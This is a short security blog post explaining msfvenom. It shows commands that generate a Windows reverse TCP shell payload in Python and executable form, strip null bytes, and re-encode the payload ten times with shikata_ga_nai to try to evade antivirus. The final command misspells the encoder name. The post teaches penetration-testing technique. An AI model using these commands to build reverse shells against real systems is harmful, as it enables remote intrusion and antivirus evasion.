top of page
  • Writer's pictureDiv0 Blog Editor

9th Day of Christmas: msfvenom


msfvenom is the successor of msfpayload and msfencode. Both msfpayload and msfencode are slated for retirement in the near future (Jun 2015). msfvenom consolidates the features of its predecessor and standardise its usage.

msfvenom is able to:

  1. Generate shellcodes (i.e. msfpayload); and

  2. Encode shellcodes into formats that can be easily deployed onto targets (i.e. msfencode).

msfvenom --help
msfvenom -l payloads
msfvenom -l encoders

To show available output formats:

msfvenom --help-formats

Executable Formats: asp, aspx, aspx-exe, dll, elf, exe, exe-only, exe-service, exe-small, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, vba, vba-exe, vbs, war

Transform Formats: bash, c, csharp, dw, dword, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

msfvenom In Action: Generate windows/shell/reverse_tcp Payload

msfvenom -p windows/shell/reverse_tcp -o

For this demo, I will set LHOST as and LPORT as 5555, and output the payload in Python format.

msfvenom -p windows/shell/reverse_tcp LHOST= LPORT=5555 -f python

Many times, there may be some bad characters in the payload that could cause the exploit to fail. One such example is the \x00 (null bytes). To remove them, we can use the -b options.

msfvenom -p windows/shell/reverse_tcp LHOST= LPORT=5555 -b "\x00" -f python

We can also output the payload in executable format:

msfvenom -p windows/shell/reverse_tcp LHOST= LPORT=5555 -b "\x00" -f exe > shell-exe

1 round of shikata_ga_nai encoding is automatically applied. shikata_ga_nai is a polymorphic XOR additive feedback encoder. We can perform extra encoding to evade antivirus detection. To encode the payload with shitaka_ga_nai 10 times:

msfvenom -p windows/shell/reverse_tcp LHOST= LPORT=5555 -b "\x00" -e "x86/shitaka_ga_nai" -i 10 -f exe > shell-exe

VirusTotal scan result on the executable with 1 round of encoding:

VirusTotal scan result on the executable with 10 rounds of encoding:

Notice both payloads yield almost the same detection rate? This is because most antivirus knows the templates used by Metasploit.


Shared by Tan Jun Hao.

24 views0 comments


Post: Blog2_Post
bottom of page